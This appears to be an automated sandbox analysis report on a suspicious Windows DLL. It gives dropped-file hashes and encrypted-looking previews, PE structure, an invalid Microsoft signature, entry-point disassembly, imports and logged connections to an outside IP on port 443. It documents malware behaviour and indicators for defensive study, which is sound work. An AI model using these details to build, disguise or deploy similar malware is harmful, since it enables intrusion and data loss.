                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:QfJENis/dmyaNkaavZOsz9XvgTthdVpv2KzfxUHn:Qf6TmyoaROsz9XvU/d2SfCHn
                                                                                                    MD5:69A2735FA26CC9FC0432CD7F261D01B3
                                                                                                    SHA1:B778A150EECAEDEED9DE8274571C0F031362108C
                                                                                                    SHA-256:3A632D29524FFA4D2D2A654B8EC8743C78A988FD69D2C5160792484E4A6BB78A
                                                                                                    SHA-512:324612A73F454540EFFF648CA5E946FC225D50B44A21C209356D4898B7F7ACA40053784CFC97C7F12307CDF05A16F3A96E0CCEA952CE0EBC47422F506A336966
                                                                                                    Malicious:false
                                                                                                    Preview:t..y....>F^.pub.J!.>..^w.Br.....,A....U...k....9..3........oRLx.(@zT..w*G.o..5..Y...K..i..]y.y.?`.....C...._..P.G...B.R..lZ...b...7..</......Nv.).L..<..e.../=..?...(...........:.x.o,.xf.p...4.L.<.{...E.ga..$"..../.T.3.9)....HY.[+.5{.).Y.J5.;0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):266
                                                                                                    Entropy (8bit):7.26130643733061
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:oWD1t0LRS7zGWqtMe7GcG1cCur5/nkFWmJNVpD94RkSn:oWptYRSPGWUMe7GcGbur5/nkFjJZiRkS
                                                                                                    MD5:E65FF033840B89F9C43C27ECBAAE9C6E
                                                                                                    SHA1:FCD5E803DB10429742F804A1752258D3ECFC9D1C
                                                                                                    SHA-256:43E46DCACF62243842402E1D90F30795FB2359A9475E1B5CABF8CBE586A6825B
                                                                                                    SHA-512:10F617F6D553E5D7679009B8D3425E1543DEE674C8DFFA100B8A37DC4E3B3378C183D48360176038EDCC18EF387B2F3EC485CA834E46A01243D4723DF4C459E8
                                                                                                    Malicious:false
                                                                                                    Preview:.G^.rI.E..{...>. ....@........`...o.G.G..wb.g.fQ|'0.I[G.....|\.f....T..%....a.*_.x ..B...d..Zr7..u...D..$....H.*..i.]............k......;Z.5....Q.$(...f.....!....M2...>..1...Y.......y.s.[.T.Nz..?...../u..E.d.'oh..R2K..._..K.69..3Z..~%.. J0.8..j0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):266
                                                                                                    Entropy (8bit):7.177229264486248
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:LNWfghPM32iCMLKwTLuTaHzxc7bOMXicLlPw7R+Dn:pIghPMmSATmxFEiiPw7Rin
                                                                                                    MD5:587F3992E0EF07BC3F4DDA90A3A75997
                                                                                                    SHA1:D9AEB6E3B1AD4683BFABE1D830BCAD6D16A5CD4C
                                                                                                    SHA-256:4E3AD022276AAC8EF1BF7B50EC6DE45F6FB0DBEBA9E809FB1E1D6C65BCA6C5AB
                                                                                                    SHA-512:C88DB0B5FB5339AEA8F18BE8D01CA93FF75BDA4C7B11DC1940D08443701E3098E08AC76B6D93F2ABB84374BC08AA71A45E542A67A8F9630401E9E5CF447B66C4
                                                                                                    Malicious:false
                                                                                                    Preview:....@R.....Q....il......?.3:)-G8..3..nF..T..5..6".$..BB....r.%.a.b....(0..|];.vd.q.r...Sx........RM...G..f^...S,gX.Zx[...c>5M..{wY..:..r.&..Y..+.$..<..\TL...3j...0..LiQ.."K.(.5.....j...B./.,....9.../b6[....^...w._..g*..Mj....64........q.c.(*.+}0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:modified
                                                                                                    Size (bytes):266
                                                                                                    Entropy (8bit):7.1174543226445515
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:o9beglqlZkmy8aWnmHU66gtABfSfdSVhYtMa9kHdxSn:Oygklymn3z6papS1SLYtB9kzSn
                                                                                                    MD5:7E7D217F94FD16061238A9CB44F15050
                                                                                                    SHA1:40301542B102DB6F205DDFF238B34089D23CCD34
                                                                                                    SHA-256:184FAC6DE7822E9774CFDB15899C28D12E23CB172215266DE521FCD93D1C7ED0
                                                                                                    SHA-512:08944E78E2D8D464195D810C460799542DE90DDC1E0E83AE84861CA012DB8DBCA49474CADED3AADC10FC292251D28CA7D5B43DDB2CF8EFF965F108698ED2DE89
                                                                                                    Malicious:false
                                                                                                    Preview:...hC(../.c=.....%......z...........Y..n>Z@>z.q...Ik>z..6..T.....-......N>/},}.!.:e.Z...jr.KHz.r/.Z. :4..yB..;..#.....Ml0#.......9.....6..e.x.:.y.4...e.}.......2X.)X$...8.cL3"6_.....C.;....+.-.u!...*E..1[:X/.j..F..&R....H....6...c.&.t x.2.G....0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):286
                                                                                                    Entropy (8bit):7.2182717529200495
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:mda3XG+DpH0Jp2L4wbmEf/yDIAUTl5GSa2tmUrH0vcY0/n:msG+e2zmEuIXTvGn2t3rUvUn
                                                                                                    MD5:6C705D373BFEC757FE87144DE4B39085
                                                                                                    SHA1:C9D62B566C2FFA6E1B5B024BBC3156E9FDBA8CF5
                                                                                                    SHA-256:8AD66DF63B3B06A92EEEA90D7F4AFDAE68352F738F89A90E03B9B9AE8CCAA848
                                                                                                    SHA-512:8D91971336B9E2BBF950FF2FC74A9E0B10C0CCDDD7C6128C79799FDDBBC5CEBBBA208B814DA07F6E06E14E0CB0E79399BB8CE5F232A1D00C7FED0CCB35110D56
                                                                                                    Malicious:false
                                                                                                    Preview:v....=.......i........y.&2.....+..}q....l....+;..$.u...e.fU:g.o......De..........[.....x...!........g.-..B.f.mz....z....%..7..mQ...~.N+..C........`....=.'....._.R4...a.....nbu;....5l.%43....Qe..!t]xx}......g. 9.7...6x..d...#8"..y.^NU..gs".#~.&7.q.M..^.'........0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):286
                                                                                                    Entropy (8bit):7.2182717529200495
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:mda3XG+DpH0Jp2L4wbmEf/yDIAUTl5GSa2tmUrH0vcY0/n:msG+e2zmEuIXTvGn2t3rUvUn
                                                                                                    MD5:6C705D373BFEC757FE87144DE4B39085
                                                                                                    SHA1:C9D62B566C2FFA6E1B5B024BBC3156E9FDBA8CF5
                                                                                                    SHA-256:8AD66DF63B3B06A92EEEA90D7F4AFDAE68352F738F89A90E03B9B9AE8CCAA848
                                                                                                    SHA-512:8D91971336B9E2BBF950FF2FC74A9E0B10C0CCDDD7C6128C79799FDDBBC5CEBBBA208B814DA07F6E06E14E0CB0E79399BB8CE5F232A1D00C7FED0CCB35110D56
                                                                                                    Malicious:false
                                                                                                    Preview:v....=.......i........y.&2.....+..}q....l....+;..$.u...e.fU:g.o......De..........[.....x...!........g.-..B.f.mz....z....%..7..mQ...~.N+..C........`....=.'....._.R4...a.....nbu;....5l.%43....Qe..!t]xx}......g. 9.7...6x..d...#8"..y.^NU..gs".#~.&7.q.M..^.'........0xABADCABA
                                                                                                    Process:C:\Windows\System32\wbem\WMIC.exe
                                                                                                    File Type:ASCII text, with CRLF, CR line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):48
                                                                                                    Entropy (8bit):4.305255793112395
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:8yzGc7C1RREal:nzGtRV
                                                                                                    MD5:6ED2062D4FB53D847335AE403B23BE62
                                                                                                    SHA1:C3030ED2C3090594869691199F46BE7A9A12E035
                                                                                                    SHA-256:43B5390113DCBFA597C4AAA154347D72F660DB5F2A0398EB3C1D35793E8220B9
                                                                                                    SHA-512:C9C302215394FEC0B38129280A8303E0AF46BA71B75672665D89828C6F68A54E18430F953CE36B74F50DC0F658CA26AC3572EA60F9E6714AFFC9FB623E3C54FC
                                                                                                    Malicious:false
                                                                                                    Preview:ERROR:...Description = Initialization failure...
                                                                                                    Process:C:\Windows\SysWOW64\PING.EXE
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):283
                                                                                                    Entropy (8bit):4.84674468132717
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:PzXULmWxHLTpUrU4wUsW3CNcwAFeMmvVOIHJFxMVlmJHaVFrIW1IrIW83Wy:P+pTpcU4nsTDAFSkIrxMVlmJHaVtr1eq
                                                                                                    MD5:38A6ED2824540859D2923148B0B1E0E1
                                                                                                    SHA1:3F99ADE9E9E545F56766083B437D956C4557D3A2
                                                                                                    SHA-256:CCB4CA9180D0A3BA685602EC69270BAD1C98D87C8D6D949AC4BE95FF719DA7B7
                                                                                                    SHA-512:C8B8BB9366862459513610A3E4EABA0DF37E1390ED47AAF92BBCB1375C92AFCA0E8A16423F953B53B25F4A533AFE569E0ACA77D2F57777D3BCAC44D15C70A7E7
                                                                                                    Malicious:false
                                                                                                    Preview:..Pinging 1.1.1.1 with 32 bytes of data:..Reply from 1.1.1.1: bytes=32 time=136ms TTL=55....Ping statistics for 1.1.1.1:.. Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 136ms, Maximum = 136ms, Average = 136ms..
                                                                                                    File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                    Entropy (8bit):6.682260957753181
                                                                                                    TrID:
                                                                                                    • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                    • DOS Executable Generic (2002/1) 0.20%
                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                    File name:TD2HjoogPx.dll
                                                                                                    File size:211'656 bytes
                                                                                                    MD5:fccd129f6a5b9d2133d14922a3614f02
                                                                                                    SHA1:e814c637e6f0c21f3aa9b43fb92cb161b4d451fc
                                                                                                    SHA256:4b4a87552c44158fb53a72c7294319b0ddde9f99f460425ad5997d3b9121cd1e
                                                                                                    SHA512:c1594504053bbe2b061880d1ff69819eca8bdd2bc882b74f415ff8a1515389e32b8d7cd1b931d65b042247fd05df1751a000d6da4219427b74e9cdb0e0e52979
                                                                                                    SSDEEP:3072:4pEegLluZoATP/QGdqlhNFIkiFnZDJVvU1nSXZOAg0Fuj0pJgOgpQkV+tpMEaE:4pDyp2AQq3FWFnRehAOXpQkY7MY
                                                                                                    TLSH:93249E007092C172D67F16380979EAA3597DBD110FB489EF67E49E3D4E742C09B32AB6
                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.B.5.,.5.,.5.,.F./.8.,.F.)...,.F.(.#.,.g.(.:.,.g./. .,.g.).p.,.F.-.6.,.5.-.J.,...%.7.,.....4.,.....4.,.Rich5.,................
                                                                                                    Icon Hash:7ae282899bbab082
                                                                                                    Entrypoint:0x10007e76
                                                                                                    Entrypoint Section:.text
                                                                                                    Digitally signed:true
                                                                                                    Imagebase:0x10000000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                    Time Stamp:0x675CC3E0 [Fri Dec 13 23:31:44 2024 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:
                                                                                                    OS Version Major:6
                                                                                                    OS Version Minor:0
                                                                                                    File Version Major:6
                                                                                                    File Version Minor:0
                                                                                                    Subsystem Version Major:6
                                                                                                    Subsystem Version Minor:0
                                                                                                    Import Hash:92a54d40c8888508df24cd0849339951
                                                                                                    Signature Valid:false
                                                                                                    Signature Issuer:CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                                                    Error Number:-2146869232
                                                                                                    Not Before, Not After
                                                                                                    • 16/11/2023 20:20:09 14/11/2024 20:20:09
                                                                                                    Subject Chain
                                                                                                    • CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                    Version:3
                                                                                                    Thumbprint MD5:9B7554FFA2D97FE692CB10D7B2E315A7
                                                                                                    Thumbprint SHA-1:D8FB0CC66A08061B42D46D03546F0D42CBC49B7C
                                                                                                    Thumbprint SHA-256:2D7FFCE2C256016291B67285456AA8DA779D711BBF8E6B85C212A157DDFBE77E
                                                                                                    Serial:3300000460CF42A912315F6FB3000000000460
                                                                                                    Instruction
                                                                                                    push ebp
                                                                                                    mov ebp, esp
                                                                                                    cmp dword ptr [ebp+0Ch], 01h
                                                                                                    jne 00007F1CFCC2FA17h
                                                                                                    call 00007F1CFCC30170h
                                                                                                    push dword ptr [ebp+10h]
                                                                                                    push dword ptr [ebp+0Ch]
                                                                                                    push dword ptr [ebp+08h]
                                                                                                    call 00007F1CFCC2F8C3h
                                                                                                    add esp, 0Ch
                                                                                                    pop ebp
                                                                                                    retn 000Ch
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    push esi
                                                                                                    mov eax, dword ptr [esp+14h]
                                                                                                    or eax, eax
                                                                                                    jne 00007F1CFCC2FA3Ah
                                                                                                    mov ecx, dword ptr [esp+10h]
                                                                                                    mov eax, dword ptr [esp+0Ch]
                                                                                                    xor edx, edx
                                                                                                    div ecx
                                                                                                    mov ebx, eax
                                                                                                    mov eax, dword ptr [esp+08h]
                                                                                                    div ecx
                                                                                                    mov esi, eax
                                                                                                    mov eax, ebx
                                                                                                    mul dword ptr [esp+10h]
                                                                                                    mov ecx, eax
                                                                                                    mov eax, esi
                                                                                                    mul dword ptr [esp+10h]
                                                                                                    add edx, ecx
                                                                                                    jmp 00007F1CFCC2FA59h
                                                                                                    mov ecx, eax
                                                                                                    mov ebx, dword ptr [esp+10h]
                                                                                                    mov edx, dword ptr [esp+0Ch]
                                                                                                    mov eax, dword ptr [esp+08h]
                                                                                                    shr ecx, 1
                                                                                                    rcr ebx, 1
                                                                                                    shr edx, 1
                                                                                                    rcr eax, 1
                                                                                                    or ecx, ecx
                                                                                                    jne 00007F1CFCC2FA06h
                                                                                                    div ebx
                                                                                                    mov esi, eax
                                                                                                    mul dword ptr [esp+14h]
                                                                                                    mov ecx, eax
                                                                                                    mov eax, dword ptr [esp+10h]
                                                                                                    mul esi
                                                                                                    add edx, ecx
                                                                                                    jc 00007F1CFCC2FA20h
                                                                                                    cmp edx, dword ptr [esp+0Ch]
                                                                                                    jnbe 00007F1CFCC2FA1Ah
                                                                                                    jc 00007F1CFCC2FA21h
                                                                                                    cmp eax, dword ptr [esp+08h]
                                                                                                    jbe 00007F1CFCC2FA1Bh
                                                                                                    dec esi
                                                                                                    sub eax, dword ptr [esp+10h]
                                                                                                    sbb edx, dword ptr [esp+14h]
                                                                                                    xor ebx, ebx
                                                                                                    sub eax, dword ptr [esp+08h]
                                                                                                    sbb edx, dword ptr [esp+0Ch]
                                                                                                    neg edx
                                                                                                    neg eax
                                                                                                    sbb edx, 00000000h
                                                                                                    mov ecx, edx
                                                                                                    mov edx, ebx
                                                                                                    mov ebx, ecx
                                                                                                    mov ecx, eax
                                                                                                    mov eax, esi
                                                                                                    pop esi
                                                                                                    retn 0010h
                                                                                                    push ebp
                                                                                                    mov ebp, esp
                                                                                                    mov eax, dword ptr [ebp+08h]
                                                                                                    push esi
                                                                                                    mov ecx, dword ptr [eax+00h]
                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x2e7f00x28.rdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x310000xf8.rsrc
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x312000x28c8
                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x320000x1cd4.reloc
                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x2c8900x70.rdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2c9000x40.rdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x210000x138.rdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                    .text0x10000x1ffb60x20000ccf9e63d329795c42d446d0392b4eb4dFalse0.5694808959960938data6.652246632685236IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                    .rdata0x210000xdef20xe000a432f9197d6edfb5169c5b68d3c2f991False0.515625data5.61481294452055IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    .data0x2f0000x1d100xe00fca075005d4259ffb8e9d24d7e3777beFalse0.21372767857142858DOS executable (block device driver @\273\,32-bit sector-support)3.4018737889891533IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    .rsrc0x310000xf80x2006c05a5ed75084ca5adb89c00a585b8afFalse0.3359375data2.5312981004807127IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    .reloc0x320000x1cd40x1e00eb54c12eb7ad3d4d3441346ea94f74a6False0.733203125data6.5115450953985565IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                    RT_MANIFEST0x310600x91XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.8689655172413793
                                                                                                    DLLImport
                                                                                                    KERNEL32.dllCreateProcessW, GetLastError, WaitForSingleObject, CloseHandle, Sleep, CreateFileW, QueryPerformanceCounter, QueryPerformanceFrequency, WideCharToMultiByte, InitializeCriticalSectionEx, GetSystemTimeAsFileTime, GetModuleHandleW, GetProcAddress, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, MultiByteToWideChar, LCMapStringEx, GetStringTypeW, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, RaiseException, InterlockedFlushSList, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameA, HeapFree, HeapAlloc, GetACP, GetStdHandle, GetFileType, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, FlushFileBuffers, WriteFile, GetConsoleCP, GetConsoleMode, ReadFile, ReadConsoleW, SetFilePointerEx, HeapReAlloc, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, SetStdHandle, HeapSize, WriteConsoleW
                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                    EnglishUnited States
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Dec 15, 2024 09:27:34.281424999 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:34.281469107 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:34.281529903 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:34.292804956 CET49707443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:34.292865038 CET4434970745.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:34.292936087 CET49707443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:34.298321009 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:34.298361063 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:34.302481890 CET49707443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:34.302524090 CET4434970745.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:35.943418980 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:35.943741083 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:35.950192928 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:35.950215101 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:35.950525999 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:35.958734989 CET4434970745.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:35.958980083 CET49707443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:35.963618994 CET49707443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:35.963634014 CET4434970745.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:35.963912964 CET4434970745.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:35.966630936 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:35.975644112 CET49707443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:36.011348009 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:36.023335934 CET4434970745.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:36.894042015 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:36.894071102 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:36.894085884 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:36.894160986 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:36.894188881 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:36.894233942 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:36.919275045 CET4434970745.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:36.919305086 CET4434970745.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:36.919327021 CET4434970745.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:36.919370890 CET49707443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:36.919405937 CET4434970745.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:36.919430017 CET49707443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:36.919451952 CET49707443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:36.930449963 CET49707443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:36.941791058 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:36.941823006 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:36.941880941 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:36.941904068 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:36.941920996 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:36.941939116 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.108081102 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.108103991 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.108138084 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.108154058 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.108175039 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.108191967 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.136620998 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.136646032 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.136687040 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.136696100 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.136713982 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.136735916 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.170290947 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.170310974 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.170381069 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.170401096 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.170434952 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.201518059 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.201538086 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.201596022 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.201622009 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.201638937 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.201658964 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.322777987 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.322799921 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.322861910 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.322885036 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.323045015 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.343918085 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.343934059 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.344053030 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.344058990 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.344094038 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.365173101 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.365201950 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.365350008 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.365362883 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.365400076 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.386281013 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.386306047 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.386409998 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.386435986 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.386476994 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.404290915 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.404311895 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.404433012 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.404458046 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.404500008 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.425303936 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.425321102 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.425453901 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.425458908 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.425496101 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.446259975 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.446284056 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.446372032 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.446396112 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.446436882 CET49706443192.168.2.845.125.67.168
